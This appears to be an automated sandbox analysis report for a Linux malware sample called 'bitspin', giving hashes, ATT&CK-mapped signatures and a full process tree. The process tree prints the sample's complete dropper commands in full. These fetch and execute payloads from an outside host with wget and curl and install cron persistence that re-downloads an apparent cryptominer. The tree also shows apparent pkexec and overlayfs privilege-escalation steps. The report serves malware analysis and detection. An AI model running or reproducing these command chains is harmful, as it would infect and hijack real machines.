d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374

General

Target

bitspin
Size

1KB
MD5

6b13e69cc37757b1f2dbc2a1c8f806f1
SHA1

01364dc40e5f1005fd7cd6e087368d64b35896f7
SHA256

d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
SHA512

c46a38378e024c06251f3aa61a35a2e31f2e6a17da1284d100d78de0708a1e0852b10da74d59ec888e374a3ed8c0533851e46410d0df48da901b151b086ffdab

Score

9^/10

antivm persistence

Malware Config

Signatures

Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs
Checks CPU information for indicators that the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

sshd

description ioc process

/proc/cpuinfo /proc/cpuinfo sshd

description	ioc	process
/proc/cpuinfo	/proc/cpuinfo	sshd

Modifies hosts file 17 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 17 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget

Creates/modifies Cron job 1 TTPs 6 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task

T1053

Processes:

shgrepshgrepgrepgrep

description	ioc	process
/etc/crontab	/etc/crontab	sh
/etc/crontab	/etc/crontab	grep
/etc/crontab	/etc/crontab	sh
/etc/crontab	/etc/crontab	grep
/etc/crontab	/etc/crontab	grep
/etc/crontab	/etc/crontab	grep

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

Processes:

sshd

description	ioc	process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	sshd
/sys/devices/system/cpu/possible	/sys/devices/system/cpu/possible	sshd

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

sshdmodprobe

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

Processes:

sshdmodprobe

description	ioc	process
/proc/meminfo	/proc/meminfo	sshd
/proc/driver/nvidia/gpus	/proc/driver/nvidia/gpus	sshd
/proc/meminfo	/proc/meminfo
/proc/self/exe	/proc/self/exe
/proc/mounts	/proc/mounts	sshd
/proc/self/cpuset	/proc/self/cpuset	sshd
/proc/cmdline	/proc/cmdline	modprobe
/proc/self/setgroups	/proc/self/setgroups
/proc/self/uid_map	/proc/self/uid_map
/proc/self/gid_map	/proc/self/gid_map

Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwget

description ioc process

/tmp/lushput /tmp/lushput wget
/tmp/seasbit /tmp/seasbit wget
/tmp/loadbit /tmp/loadbit wget

description	ioc	process
/tmp/lushput	/tmp/lushput	wget
/tmp/seasbit	/tmp/seasbit	wget
/tmp/loadbit	/tmp/loadbit	wget

/tmp/bitspin
/tmp/bitspin
1⤵
PID:576

/bin/sh
/bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/; chmod 777 /var/tmp/incbit; curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit; chmod 777 /var/tmp/incbit; cd /var/tmp; ./incbit; cd /var/tmp; rm incbit; wget -nc http://dash.cloudflare.ovh/mvt/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://dash.cloudflare.ovh/mvt/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://dash.cloudflare.ovh/mvt/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://dash.cloudflare.ovh/mvt/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://dash.cloudflare.ovh/mvt/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://dash.cloudflare.ovh/mvt/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://dash.cloudflare.ovh/mvt/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://dash.cloudflare.ovh/mvt/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"
1⤵
PID:576

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/
2⤵
- Modifies hosts file
- Writes DNS configuration
PID:577

/bin/chmod
chmod 777 /var/tmp/incbit
2⤵
PID:582

/bin/chmod
chmod 777 /var/tmp/incbit
2⤵
PID:583

./incbit
./incbit
2⤵
PID:584

/bin/sh
/bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
2⤵
PID:584

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:585

/bin/chmod
chmod 777 /var/tmp/unix.sh
3⤵
PID:586

/bin/chmod
chmod 777 /var/tmp/unix.sh
3⤵
PID:587

./unix.sh
./unix.sh
3⤵
PID:588

/bin/sh
/bin/sh ./unix.sh
3⤵
PID:588

/bin/rm
rm unix.sh
3⤵
PID:590

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:591

/bin/chmod
chmod 777 /var/tmp/sshd
3⤵
PID:592

/bin/chmod
chmod 777 /var/tmp/sshd
3⤵
PID:593

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:594

/bin/grep
grep -qxF
3⤵
PID:596

/usr/bin/crontab
crontab -l
3⤵
PID:595

/usr/bin/crontab
crontab -
3⤵
PID:598

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:600

/bin/chmod
chmod 777 /var/tmp/truct.sh
3⤵
PID:601

/bin/chmod
chmod 777 /var/tmp/truct.sh
3⤵
PID:602

./truct.sh
./truct.sh
3⤵
PID:603

/bin/sh
/bin/sh ./truct.sh
3⤵
PID:603

/usr/bin/crontab
crontab -l
4⤵
PID:604

/bin/grep
grep -qxF "0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'"
4⤵
PID:605

/usr/bin/crontab
crontab -
4⤵
PID:607

/bin/rm
rm truct.sh
3⤵
PID:609

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:610

/bin/chmod
chmod 777 /var/tmp/brict.sh
3⤵
PID:611

/bin/chmod
chmod 777 /var/tmp/brict.sh
3⤵
PID:612

./brict.sh
./brict.sh
3⤵
PID:613

/bin/sh
/bin/sh ./brict.sh
3⤵
PID:613

/usr/bin/crontab
crontab -l
4⤵
PID:614

/bin/grep
grep -qxF "* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'"
4⤵
PID:615

/usr/bin/crontab
crontab -
4⤵
PID:617

/bin/rm
rm brict.sh
3⤵
PID:619

/usr/bin/flock
/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
3⤵
PID:620

/bin/sh
/bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
4⤵
PID:621

/usr/bin/nohup
nohup ./sshd
5⤵
PID:622

./sshd
./sshd
5⤵
- Attempts to identify hypervisor via CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:622

/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
6⤵
PID:629

/sbin/modprobe
/sbin/modprobe msr "allow_writes=on"
7⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:630

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:623

/bin/chmod
chmod 777 /var/tmp/retrict.sh
3⤵
PID:634

/bin/chmod
chmod 777 /var/tmp/retrict.sh
3⤵
PID:635

./retrict.sh
./retrict.sh
3⤵
PID:636

/bin/sh
/bin/sh ./retrict.sh
3⤵
- Creates/modifies Cron job
PID:636

/bin/grep
grep -qxF "0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'" /etc/crontab
4⤵
- Creates/modifies Cron job
PID:637

/bin/rm
rm retrict.sh
3⤵
PID:638

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:639

/bin/chmod
chmod 777 /var/tmp/politrict.sh
3⤵
PID:641

/bin/chmod
chmod 777 /var/tmp/politrict.sh
3⤵
PID:642

./politrict.sh
./politrict.sh
3⤵
PID:643

/bin/sh
/bin/sh ./politrict.sh
3⤵
- Creates/modifies Cron job
PID:643

/bin/grep
grep -qxF "* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'" /etc/crontab
4⤵
- Creates/modifies Cron job
PID:644

/bin/rm
rm politrict.sh
3⤵
PID:645

/usr/bin/flock
/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
3⤵
PID:646

/bin/rm
rm incbit
2⤵
PID:647

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/lushput -q -P /tmp/
2⤵
- Modifies hosts file
- Writes DNS configuration
- Writes file to tmp directory
PID:648

/bin/chmod
chmod 777 /tmp/lushput
2⤵
PID:649

/bin/chmod
chmod 777 /tmp/lushput
2⤵
PID:650

./lushput
./lushput "wget -nc http://dash.cloudflare.ovh/mvt/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://dash.cloudflare.ovh/mvt/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow"
2⤵
PID:651

/usr/bin/pkexec
2⤵
PID:651

/bin/pkexec
2⤵
PID:651

/usr/bin/pkexec
2⤵
PID:651

/bin/rm
rm -rf "GCONV_PATH=." bitspin lushput systemd-private-ac1e6a06763947c182fe05199fb1756d-systemd-resolved.service-3vbPcN systemd-private-ac1e6a06763947c182fe05199fb1756d-systemd-timesyncd.service-thgPxt
2⤵
PID:653

/bin/rm
rm -rf .pkexec
2⤵
PID:654

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/seasbit -q -P /tmp/
2⤵
- Modifies hosts file
- Writes DNS configuration
- Writes file to tmp directory
PID:655

/bin/chmod
chmod 777 /tmp/seasbit
2⤵
PID:656

/bin/chmod
chmod 777 /tmp/seasbit
2⤵
PID:657

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/loadbit -q -P /tmp/
2⤵
- Modifies hosts file
- Writes DNS configuration
- Writes file to tmp directory
PID:658

/bin/chmod
chmod 777 /tmp/loadbit
2⤵
PID:659

/bin/chmod
chmod 777 /tmp/loadbit
2⤵
PID:660

./loadbit
./loadbit
2⤵
PID:661

./ovlcap/upper/magic
./ovlcap/upper/magic shell
2⤵
PID:661

/bin/bash
/bin/bash -c /tmp/seasbit
2⤵
PID:661

/tmp/seasbit
/tmp/seasbit
2⤵
PID:661

/bin/sh
/bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
2⤵
PID:661

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:668

/bin/chmod
chmod 777 /var/tmp/unix.sh
3⤵
PID:669

/bin/chmod
chmod 777 /var/tmp/unix.sh
3⤵
PID:670

./unix.sh
./unix.sh
3⤵
PID:671

/bin/sh
/bin/sh ./unix.sh
3⤵
PID:671

/bin/rm
rm unix.sh
3⤵
PID:673

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/
3⤵
PID:674

/bin/chmod
chmod 777 /var/tmp/sshd
3⤵
PID:675

/bin/chmod
chmod 777 /var/tmp/sshd
3⤵
PID:676

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/
3⤵
PID:677

/bin/grep
grep -qxF
3⤵
PID:679

/usr/bin/crontab
crontab -l
3⤵
PID:678

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:680

/bin/chmod
chmod 777 /var/tmp/truct.sh
3⤵
PID:681

/bin/chmod
chmod 777 /var/tmp/truct.sh
3⤵
PID:682

./truct.sh
./truct.sh
3⤵
PID:683

/bin/sh
/bin/sh ./truct.sh
3⤵
PID:683

/usr/bin/crontab
crontab -l
4⤵
PID:684

/bin/grep
grep -qxF "0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'"
4⤵
PID:685

/bin/rm
rm truct.sh
3⤵
PID:686

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:687

/bin/chmod
chmod 777 /var/tmp/brict.sh
3⤵
PID:688

/bin/chmod
chmod 777 /var/tmp/brict.sh
3⤵
PID:689

./brict.sh
./brict.sh
3⤵
PID:690

/bin/sh
/bin/sh ./brict.sh
3⤵
PID:690

/usr/bin/crontab
crontab -l
4⤵
PID:691

/bin/grep
grep -qxF "* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'"
4⤵
PID:692

/bin/rm
rm brict.sh
3⤵
PID:693

/usr/bin/flock
/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
3⤵
PID:694

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:695

/bin/chmod
chmod 777 /var/tmp/retrict.sh
3⤵
PID:696

/bin/chmod
chmod 777 /var/tmp/retrict.sh
3⤵
PID:697

./retrict.sh
./retrict.sh
3⤵
PID:698

/bin/sh
/bin/sh ./retrict.sh
3⤵
PID:698

/bin/grep
grep -qxF "0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'" /etc/crontab
4⤵
- Creates/modifies Cron job
PID:699

/bin/rm
rm retrict.sh
3⤵
PID:700

/usr/bin/wget
wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/
3⤵
- Modifies hosts file
- Writes DNS configuration
PID:701

/bin/chmod
chmod 777 /var/tmp/politrict.sh
3⤵
PID:702

/bin/chmod
chmod 777 /var/tmp/politrict.sh
3⤵
PID:703

./politrict.sh
./politrict.sh
3⤵
PID:704

/bin/sh
/bin/sh ./politrict.sh
3⤵
PID:704

/bin/grep
grep -qxF "* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'" /etc/crontab
4⤵
- Creates/modifies Cron job
PID:705

/bin/rm
rm politrict.sh
3⤵
PID:706

/usr/bin/flock
/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
3⤵
PID:707

/bin/rm
rm -rf loadbit ovlcap seasbit
2⤵
PID:708

/usr/bin/crontab
crontab -l
1⤵
PID:599

/usr/bin/crontab
crontab -l
1⤵
PID:608

/usr/bin/crontab
crontab -l
1⤵
PID:618

/bin/sh
sh -c "rm -rf './ovlcap/'"
1⤵
PID:663

/bin/rm
rm -rf ./ovlcap/
2⤵
PID:664

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

1

T1568

Impact

description	ioc	process
/sys/devices/virtual/dmi/id/chassis_vendor	/sys/devices/virtual/dmi/id/chassis_vendor	sshd
/sys/bus/cpu/devices/cpu0/topology/core_siblings	/sys/bus/cpu/devices/cpu0/topology/core_siblings	sshd
/sys/bus/cpu/devices/cpu0/cache/index1/id	/sys/bus/cpu/devices/cpu0/cache/index1/id	sshd
/sys/bus/cpu/devices/cpu0/cache/index3/level	/sys/bus/cpu/devices/cpu0/cache/index3/level	sshd
/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	sshd
/sys/bus/dax/devices/	/sys/bus/dax/devices/	sshd
/sys/devices/system/node/online	/sys/devices/system/node/online	sshd
/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	sshd
/sys/devices/virtual/dmi/id/product_version	/sys/devices/virtual/dmi/id/product_version	sshd
/sys/fs/cgroup/cpuset//cpuset.cpus	/sys/fs/cgroup/cpuset//cpuset.cpus	sshd
/sys/bus/cpu/devices/cpu0/topology/core_id	/sys/bus/cpu/devices/cpu0/topology/core_id	sshd
/sys/bus/cpu/devices/cpu0/cache/index0/type	/sys/bus/cpu/devices/cpu0/cache/index0/type	sshd
/sys/bus/cpu/devices/cpu0/cache/index1/level	/sys/bus/cpu/devices/cpu0/cache/index1/level	sshd
/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	sshd
/sys/devices/virtual/dmi/id/chassis_version	/sys/devices/virtual/dmi/id/chassis_version	sshd
/sys/devices/virtual/dmi/id/chassis_serial	/sys/devices/virtual/dmi/id/chassis_serial	sshd
/sys/devices/virtual/dmi/id/chassis_asset_tag	/sys/devices/virtual/dmi/id/chassis_asset_tag	sshd
/sys/devices/virtual/dmi/id/bios_vendor	/sys/devices/virtual/dmi/id/bios_vendor	sshd
/sys/bus/cpu/devices/cpu0/topology/physical_package_id	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	sshd
/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	sshd
/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	sshd
/sys/devices/virtual/dmi/id	/sys/devices/virtual/dmi/id	sshd
/sys/firmware/dmi/tables/smbios_entry_point	/sys/firmware/dmi/tables/smbios_entry_point	sshd
/sys/fs/cgroup/cpuset//cpuset.mems	/sys/fs/cgroup/cpuset//cpuset.mems	sshd
/sys/bus/cpu/devices/cpu0/cache/index2/size	/sys/bus/cpu/devices/cpu0/cache/index2/size	sshd
/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	sshd
/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	sshd
/sys/bus/node/devices/node0/hugepages	/sys/bus/node/devices/node0/hugepages	sshd
/sys/fs/cgroup/unified/cgroup.controllers	/sys/fs/cgroup/unified/cgroup.controllers	sshd
/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	sshd
/sys/devices/virtual/dmi/id/bios_version	/sys/devices/virtual/dmi/id/bios_version	sshd
/sys/devices/virtual/dmi/id/sys_vendor	/sys/devices/virtual/dmi/id/sys_vendor	sshd
/sys/firmware/dmi/tables/DMI	/sys/firmware/dmi/tables/DMI	sshd
/sys/bus/cpu/devices/cpu0/cache/index1/type	/sys/bus/cpu/devices/cpu0/cache/index1/type	sshd
/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	sshd
/sys/bus/node/devices/node0/meminfo	/sys/bus/node/devices/node0/meminfo	sshd
/sys/devices/virtual/dmi/id/board_serial	/sys/devices/virtual/dmi/id/board_serial	sshd
/sys/devices/virtual/dmi/id/chassis_type	/sys/devices/virtual/dmi/id/chassis_type	sshd
/sys/bus/cpu/devices/cpu0/topology/die_cpus	/sys/bus/cpu/devices/cpu0/topology/die_cpus	sshd
/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	sshd
/sys/module/msr/initstate	/sys/module/msr/initstate	modprobe
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
/sys/bus/cpu/devices/cpu0/cache/index2/id	/sys/bus/cpu/devices/cpu0/cache/index2/id	sshd
/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	sshd
/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	sshd
/sys/bus/node/devices/node0/access0/initiators	/sys/bus/node/devices/node0/access0/initiators	sshd
/sys/devices/virtual/dmi/id/board_version	/sys/devices/virtual/dmi/id/board_version	sshd
/sys/bus/cpu/devices/cpu0/topology/cluster_cpus	/sys/bus/cpu/devices/cpu0/topology/cluster_cpus	sshd
/sys/bus/cpu/devices/cpu0/cache/index0/id	/sys/bus/cpu/devices/cpu0/cache/index0/id	sshd
